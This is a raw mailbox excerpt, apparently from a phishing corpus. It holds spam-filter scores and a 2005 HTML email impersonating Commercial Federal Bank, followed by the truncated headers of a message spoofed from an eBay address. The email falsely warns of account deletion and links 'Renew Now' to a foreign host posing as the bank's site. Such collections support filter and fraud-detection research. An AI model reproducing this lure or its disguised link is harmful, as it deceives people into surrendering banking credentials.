	*  0.0 NO_REAL_NAME From: does not include a real name
	*  2.0 RCVD_IN_SORBS_DUL RBL: SORBS: sent directly from dynamic IP address
	*      [66.214.184.186 listed in dnsbl.sorbs.net]
	*  3.8 RCVD_IN_DSBL RBL: Received via a relay in list.dsbl.org
	*      [<http://dsbl.org/listing?66.214.184.186>]
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?66.214.184.186>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [66.214.184.186 listed in sbl-xbl.spamhaus.org]
	*  0.1 RCVD_IN_NJABL_DUL RBL: NJABL: dialup sender did non-local SMTP
	*      [66.214.184.186 listed in combined.njabl.org]
Message-Id: <20051004200432.2BC3A6FA3DC@mail2.monkey.org>
Content-Length: 1880
Lines: 19
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 301

<FONT face=Arial size=2><IMG src="http://www.ddfl.org/furryscurry/logos/commercial.gif"><BR><BR><BR>&nbsp;&nbsp;&nbsp;Dear Commercial&nbsp;Federal Bank&nbsp;Customer,<BR>&nbsp; 
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; This is your official notification from Commercial&nbsp;Federal Bank that the service(s) listed below<BR>&nbsp;&nbsp; will be deactivated and deleted if not renewed immediately. Previous notifications have<BR>&nbsp;&nbsp; been sent to the Access<i>Online</i> Contact assigned to this account. As the Primary Contact, you<BR>&nbsp;&nbsp; must renew the service(s) listed below or it will be deactivated and deleted. <A onfiltered="return ShowLinkWarning()" href="http://ns.jasin.co.kr/comfedbank.com/index.htm" onclick="return ShowLinkWarning()"><FONT color=#003399>Renew Now</FONT></A></DIV>
<DIV><FONT color=#003399></FONT>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; SERVICE : Commercial&nbsp;Federal Bank&nbsp;<EM></EM>Access<i>Online</i> with Bill Payment.<BR>&nbsp;&nbsp; EXPIRATION: October&nbsp;15, 2005</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; Thank you,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp;&nbsp;Commercial&nbsp;Federal Bank&nbsp;Online Banking Support, N.A.</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; *****************************************************************************<BR>&nbsp;&nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<BR>&nbsp;&nbsp; *****************************************************************************</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message. For any inquiries, contact Customer Service.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Document Reference: (92051208).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Commercial&nbsp;Federal Bank, N.A. Member FDIC.&nbsp; Equal Housing Lender.<BR>&nbsp;&nbsp; Copyright  2005 Commercial&nbsp;Federal Bank, N.A. All rights reserved.</DIV></FONT>

cdgjph

From support_num_576@ebay.com  Tue Oct  4 17:02:02 2005
Return-Path: <support_num_576@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id B8B0F536E17
	for <jose@login.monkey.org>; Tue,  4 Oct 2005 17:02:01 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id B67436FA3F7
	for <jose@monkey.org>; Tue,  4 Oct 2005 17:01:56 -0400 (EDT)
Received: from c-24-98-125-166.hsd1.ga.comcast.net (c-24-98-125-166.hsd1.ga.comcast.net [24.98.125.166])
	by mail2.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Tue,  4 Oct 2005 17:01:56 -0400 (EDT)
FCC: mailbox://support_num_576@ebay.com/Sent
X-Identity-Key: id1
Date: Tue, 04 Oct 2005 14:52:56 -0700
